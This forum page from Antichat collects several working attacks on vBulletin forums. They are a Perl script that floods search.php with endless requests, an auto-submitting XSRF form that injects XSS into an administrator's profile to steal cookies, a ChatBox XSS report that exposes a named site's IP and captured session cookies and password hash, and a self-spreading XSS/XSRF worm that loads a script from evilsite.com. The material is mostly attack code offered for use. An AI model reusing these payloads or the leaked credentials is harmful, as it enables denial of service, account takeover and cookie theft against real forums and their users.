ANTICHAT — форум по информационной безопасности, OSINT и технологиям

#!"c:\perl\bin\perl.exe"
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)
{
$user="h4x0r".$rand.$i;
$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|" ;

}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
print "\~rippers~ team\n";
print "\twww.~rippers~.org\n\n";




exit();
};

############################################################### 
Autor: NBBN 
Founded: 5, January 2008 
vBulletin Version: 3.6.8 Patch Level x and possible lower 
Type: XSRF/XSS 
Risk: Medium 
############################################################### 

##Explanation(english)## 

My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable. 
Administrators can use html in there own usertitle. 
An attacker can update the profile of an administrator by sending a link to a 
site with a code like this: 


 <html> 
  <head></head> 
  <body onLoad=javascript:document.form.submit()> 

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile" 
method="POST" name="form"> 

<input type="hidden" name="s" value=""> 
<input type="hidden" name="do" value="updateprofile"> 
<input type="hidden" name="customtext" value="###########XSS CODE#########"> 
<!-- Attacker's XSS Code --> 
<input type="hidden" name="month" value="-1"> 
<input type="hidden" name="day" value="-1"> 
<input type="hidden" name="year" value=""> 
<input type="hidden" name="oldbirthday" value=""> 
<input type="hidden" name="showbirthday" value="2"> 
<input type="hidden" name="homepage" value=""> 
<input type="hidden" name="icq" value=""> 
<input type="hidden" name="aim" value=""> 
<input type="hidden" name="msn" value=""> 
<input type="hidden" name="yahoo" value=""> 
<input type="hidden" name="skype" value=""> 
</form> 
</body> 
</html>

If an attacker send a link in a pm for example, to the admin with a site 
like the example code, the admin's usertitle updating and have a the code of 
the attacker.The code executing if the admin have a post done in a thread 
etc. An attacker can use this to steal the cookie of all user's who are 
reading the thread. 


##Explanation(Deutsch/German)##: 

In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann, um 
XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML Code 
verwenden. Das kann ein Angreifer ausnutzen um beliebigen html/javascript 
code auszuführen, wenn er den oben stehenden code in eine Seite packt und 
dann dem Admin eine Private Nachricht sendet, mit einem Link zu einer Seite 
mit dem obigen HTML-Code. Somit ist es dem Angreifer möglich, alle Cookies 
von den Benutzern zu klauen, die gerade einen Thread lesen,in welchem ein 
Administrator gepostet hat.

####################################### Vbulletin Plugin ChatBox Xss Vulnerability   #
 
Discovered By Alemin_Krali# al3m@bsdmail.org                          # www.al3m.blogspot.com    
# Greetz : BeyazKurt,Kerem125,Cr@zy_King,Ercu_145,Abo Mohammed (Net Devil)# High Risk
Vulnerability! Xss Working!######################################note:You login site and xss try.
 
Ex:
http://www.localhost/misc.php?do=ccarc&cbt=xss
 
Example Site:
http://www.megaturks.net/forum/misc.php?do=ccarc&cbt=xss
 
and cookie
 
XSS acigi bulunan site=> www.megaturks.net — 16.08.2008 22:01 de kayit edilmistir. IP Adresi:
78.163.55.84 (whois)Cookies: bblastvisit=1218911541; bblastactivity=0;
bbforum_view=fcef3869fbbf346863082895ed158bd5de6700a1a-2-{i-170_i-1218911557_i-
158_i-1218911699_};bbpassword:
7750c66b19631528799b516d65de5ef1;bbuserid=9524;bbthread_lastview=f0d6496e44c2b0af
6b488fb24676aca245e8e60aa-1-{i-11619_i-1218911714_}
 
this big lammer center:)
a bugs life!
###########################################

/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF

 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.

 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}








function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
               
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

}
}
}
}


getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');

# milw0rm.com [2008-11-20]